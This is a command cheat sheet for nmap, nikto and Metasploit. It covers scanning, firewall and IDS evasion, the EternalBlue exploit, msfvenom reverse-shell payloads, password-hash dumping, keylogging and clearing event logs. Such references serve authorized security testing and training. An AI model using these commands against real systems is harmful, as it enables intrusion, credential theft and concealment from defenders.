// Host Discovery
Ping Sweep
nmap -sn <network/cidr>
Find all live hosts without port scanning
Skip Host Discovery
nmap -Pn <target>
Treat all hosts as up — scan even if no ping response
ARP Scan (LAN)
nmap -PR -sn <network/cidr>
Fast and reliable host discovery on local network
TCP SYN Ping
nmap -PS22,80,443 <target>
Discover hosts via SYN packets to specific ports
UDP Ping
nmap -PU53,161 <target>
Discover hosts via UDP — useful when ICMP is blocked
List Scan (No Scan)
nmap -sL <network/cidr>
List targets and do reverse DNS — no actual scanning
// Port Scanning
Default Scan (Top 1000)
nmap <target>
Scan top 1000 ports — fast default
All 65535 Ports
nmap -p- <target>
Full port sweep — slow but thorough
Specific Ports
nmap -p 22,80,443,3306,8080 <target>
Scan only specified ports
Port Range
nmap -p 1-1024 <target>
Scan a range of ports
Top N Ports
nmap --top-ports 100 <target>
Scan the N most commonly used ports
SYN Scan (Stealth)
nmap -sS <target> ROOT
Half-open scan — less noisy, doesn't complete handshake
TCP Connect Scan
nmap -sT <target>
Full TCP handshake — works without root, more detectable
UDP Scan
nmap -sU <target> SLOW
Scan UDP — finds DNS(53), SNMP(161), DHCP(67)
TCP + UDP Combined
nmap -sS -sU -p T:80,U:53 <target>
Scan both TCP and UDP in one run
FIN / NULL / Xmas Scans
nmap -sF / -sN / -sX <target>
Firewall evasion techniques — may bypass stateless filters
// Detection & Fingerprinting
Service Version Detection
nmap -sV <target>
Detect service names and versions on open ports
OS Detection
nmap -O <target> ROOT
Identify target operating system via TCP/IP fingerprinting
Aggressive Scan
nmap -A <target> NOISY
OS + versions + default scripts + traceroute
Version Intensity Max
nmap -sV --version-intensity 9 <target>
Max probe level for version detection (0-9)
Traceroute
nmap --traceroute <target>
Map network path to the target
TTL & Window Size
nmap -O --osscan-guess <target>
Aggressive OS guess when not 100% certain
// NSE Scripts
Default Scripts
nmap -sC <target>
Run default safe NSE scripts
Vulnerability Scan
nmap --script vuln <target>
Run all vulnerability detection scripts
Safe Scripts Only
nmap --script safe <target>
Non-intrusive information gathering
HTTP Enumeration
nmap --script http-enum -p 80,443 <target>
Enumerate web directories and common paths
HTTP Methods
nmap --script http-methods -p 80,443 <target>
Show allowed HTTP methods (PUT, DELETE etc.)
HTTP Title
nmap --script http-title -p 80,443,8080 <target>
Get page titles from web services
SMB Vulnerabilities
nmap --script smb-vuln-* -p 445 <target>
Check EternalBlue, MS17-010 and other SMB vulns
SMB Shares
nmap --script smb-enum-shares -p 445 <target>
List accessible SMB file shares
Banner Grabbing
nmap --script banner <target>
Grab service banners from all open ports
FTP Anonymous Login
nmap --script ftp-anon -p 21 <target>
Check if FTP allows anonymous access
SSH Auth Methods
nmap --script ssh-auth-methods -p 22 <target>
List accepted SSH authentication methods
DNS Brute Force
nmap --script dns-brute <target>
Enumerate subdomains via brute force
SSL Certificate Info
nmap --script ssl-cert -p 443 <target>
Get SSL certificate details and expiry
Heartbleed Check
nmap --script ssl-heartbleed -p 443 <target>
Test for CVE-2014-0160 Heartbleed vulnerability
MySQL Info
nmap --script mysql-info -p 3306 <target>
Get MySQL server info and capabilities
RDP Screenshot
nmap --script rdp-screenshot -p 3389 <target>
Capture screenshot of RDP login screen
// Evasion & Firewall Bypass
Fragment Packets
nmap -f <target>
Split packets into 8-byte fragments to evade IDS
Decoy Scan
nmap -D RND:5 <target>
Use 5 random decoy IPs to mask your real address
Spoof Source IP
nmap -S <spoof-ip> -e eth0 <target>
Spoof source IP address (use with care)
Randomize Hosts
nmap --randomize-hosts <network/cidr>
Scan hosts in random order to avoid detection patterns
Bad Checksum
nmap --badsum <target>
Send packets with bad checksum — detects firewalls
Source Port Spoof
nmap --source-port 53 <target>
Use port 53 (DNS) as source — bypasses some firewalls
// Output & Reporting
Normal Output
nmap <target> -oN scan.txt
Save human-readable output to file
XML Output
nmap <target> -oX scan.xml
Save as XML — importable into Metasploit
Grepable Output
nmap <target> -oG scan.gnmap
Save in grep-friendly format for parsing
All Formats
nmap <target> -oA results
Save .nmap, .xml and .gnmap simultaneously
Verbose
nmap -v / -vv <target>
Show results as they arrive (-vv = more detail)
Reason for State
nmap --reason <target>
Show why nmap classified each port as open/closed
// Speed & Timing Reference
| -T0 Paranoid | Extremely slow — max IDS evasion, one packet every 5 min |
| -T1 Sneaky | Very slow — some IDS evasion |
| -T2 Polite | Slower — reduces bandwidth and resource use |
| -T3 Normal | Default timing — balanced speed and accuracy |
| -T4 Aggressive | Fast — assumes reliable, low-latency network |
| -T5 Insane | Very fast — may miss results on slow networks |
// Basic Scans
Basic Web Scan
nikto -h <target>
Scan web server on port 80 for common vulnerabilities
HTTPS Scan
nikto -h <target> -ssl
Force SSL/HTTPS scan on port 443
Custom Port
nikto -h <target> -p 8080
Scan web server on non-standard port
HTTPS Custom Port
nikto -h <target> -ssl -p 8443
HTTPS scan on non-standard port
Scan Multiple Ports
nikto -h <target> -p 80,443,8080,8443
Scan multiple web ports in one run
Scan via URL
nikto -h https://<target>/path/
Scan starting from a specific URL path
// Authentication
Basic Auth
nikto -h <target> -id user:pass
Scan with HTTP basic authentication
Cookie Auth
nikto -h <target> -cookies "session=abc123"
Pass session cookie for authenticated scanning
Custom Header
nikto -h <target> -useragent "Mozilla/5.0"
Set a custom User-Agent string
// Evasion & Advanced
Through Burp Proxy
nikto -h <target> -useproxy http://127.0.0.1:8080
Route traffic through Burp Suite for inspection
Evasion Mode 1
nikto -h <target> -evasion 1
Random URI encoding — bypass basic WAF/IDS
Evasion Mode 2
nikto -h <target> -evasion 2
Directory self-reference (/./) insertion
No SSL Verify
nikto -h <target> -nossl
Disable SSL certificate verification
Disable DNS Lookup
nikto -h <target> -nodns
Skip DNS lookups — faster, avoids DNS-based detection
Pause Between Requests
nikto -h <target> -pause 2
Wait 2 seconds between requests — evade rate limiting
Timeout Setting
nikto -h <target> -timeout 10
Set request timeout in seconds
Update Plugins
nikto -update
Update Nikto plugins and databases
// Specific Tuning
XSS Only
nikto -h <target> -Tuning 4
Test for XSS and script injection only
SQL Injection Only
nikto -h <target> -Tuning 9
Test for SQL injection vulnerabilities only
Info Disclosure + Misconfig
nikto -h <target> -Tuning 2,3
Check for misconfigurations and info leakage
All Tests
nikto -h <target> -Tuning x
Run every available test category
// Output
Save as HTML
nikto -h <target> -o report.html -Format htm
Save full scan results as HTML report
Save as Text
nikto -h <target> -o report.txt
Save results as plain text
Save as CSV
nikto -h <target> -o report.csv -Format csv
Export to CSV for spreadsheet import
Save as XML
nikto -h <target> -o report.xml -Format xml
Save as XML for tool integration
// Tuning Reference
| -T 0 | File Upload vulnerabilities |
| -T 1 | Interesting files / seen in logs |
| -T 2 | Misconfiguration / default files |
| -T 3 | Information Disclosure |
| -T 4 | Injection (XSS / Script / HTML) |
| -T 5 | Remote File Retrieval (inside webroot) |
| -T 6 | Denial of Service |
| -T 7 | Remote File Retrieval (server-wide) |
| -T 8 | Command Execution / Remote Shell |
| -T 9 | SQL Injection |
| -T x | Reverse Tuning — exclude selected categories |
// Starting Up
Launch Console
msfconsole
Start the Metasploit Framework interactive console
Launch Quiet
msfconsole -q
Start without ASCII art banner — cleaner output
Init Database
msfdb init
Initialize PostgreSQL database for Metasploit
DB Status
db_status
Check if database is connected inside msfconsole
Import Nmap XML
db_import scan.xml
Import nmap XML scan results into the database
Show Hosts from DB
hosts
List all hosts discovered and stored in the database
Show Services from DB
services
List all services detected from imported scans
// Search & Navigation
Search by Name
search eternalblue
Find modules by name, platform or author
Search by CVE
search cve:2017-0144
Find modules by CVE number
Search by Platform
search platform:windows type:exploit
Filter by OS platform and module type
Use Module
use exploit/windows/smb/ms17_010_eternalblue
Select a module — can also use the result number from search
Module Info
info
Full details about current module — targets, CVEs, refs
Go Back
back
Deselect current module, return to main console
// Configuration
Show Options
show options
List all required and optional parameters
Show Advanced Options
show advanced
List advanced/hidden configuration options
Set Target Host
set RHOSTS <target>
Set remote host(s) — accepts IP, range, or CIDR
Set Target Port
set RPORT 445
Set the remote port to attack
Set Local Host
set LHOST <your-ip>
Your IP address for reverse shell callbacks
Set Local Port
set LPORT 4444
Local port to listen on for incoming connections
Show Payloads
show payloads
List compatible payloads for current module
Set Payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Choose the payload to deliver on exploitation
Unset Option
unset RHOSTS
Clear a configured option
Set Global Option
setg LHOST <your-ip>
Set option globally — persists across modules
// Execution
Check Vulnerability
check
Test if target is vulnerable without exploiting
Run / Exploit
run
Execute the current module (alias: exploit)
Run as Background Job
run -j
Run module in background — keep console free
List Jobs
jobs
Show all running background jobs
Kill Job
kill 0
Terminate a background job by ID
// Sessions
List Sessions
sessions -l
Show all active sessions
Interact with Session
sessions -i 1
Connect to session by ID number
Background Session
background
Send current session to background
Kill Session
sessions -k 1
Terminate a session by ID
Upgrade to Meterpreter
sessions -u 1
Upgrade a basic shell session to Meterpreter
Run Module on Session
sessions -s post/module
Run a post-exploitation module on all sessions
// Meterpreter
System Info
sysinfo
Get OS, hostname and architecture of target
Current User
getuid
Show which user the session is running as
Get Shell
shell
Drop into a native OS command shell
List Processes
ps
Show all running processes on target
Migrate Process
migrate <PID>
Move into another process — useful for persistence
Privilege Escalation
getsystem
Attempt to elevate to SYSTEM/root privileges
Dump Password Hashes
hashdump
Extract password hashes from SAM database (Windows)
Download File
download /path/to/file
Download file from target to your machine
Upload File
upload localfile /remote/path
Upload file from your machine to target
Screenshot
screenshot
Capture screenshot of target's desktop
Keylogger Start
keyscan_start
Start capturing keystrokes on target
Keylogger Dump
keyscan_dump
Display captured keystrokes
Network Interfaces
ipconfig
Show network interfaces of target machine
ARP Table
arp
Show ARP table — reveals other hosts on local network
Port Forward
portfwd add -l 8080 -p 80 -r <target>
Forward local port to target — pivot into internal network
Clear Event Logs
clearev
Clear Windows event logs to cover tracks
// Auxiliary Modules
TCP Port Scanner
use auxiliary/scanner/portscan/tcp
Built-in TCP port scanner
SMB Version Scan
use auxiliary/scanner/smb/smb_version
Detect SMB version on target hosts
SMB Login Check
use auxiliary/scanner/smb/smb_login
Brute force or test SMB credentials
SSH Login Brute
use auxiliary/scanner/ssh/ssh_login
Brute force SSH credentials
FTP Login Brute
use auxiliary/scanner/ftp/ftp_login
Brute force FTP credentials
HTTP Version
use auxiliary/scanner/http/http_version
Identify web server type and version
HTTP Directory Brute
use auxiliary/scanner/http/dir_scanner
Brute force web directories and paths
MySQL Login
use auxiliary/scanner/mysql/mysql_login
Brute force MySQL credentials
DNS Enumeration
use auxiliary/gather/dns_enum
Enumerate DNS records for a domain
SNMP Sweep
use auxiliary/scanner/snmp/snmp_enum
Enumerate SNMP information from devices
// Listeners & Handlers
Multi Handler
use exploit/multi/handler
Generic listener — catch reverse shells and payloads
Generate Payload (msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe
Generate standalone executable payload
List Payload Formats
msfvenom --list formats
Show all output formats: exe, elf, php, py, raw, etc.
List Encoders
msfvenom --list encoders
Show available encoders for AV evasion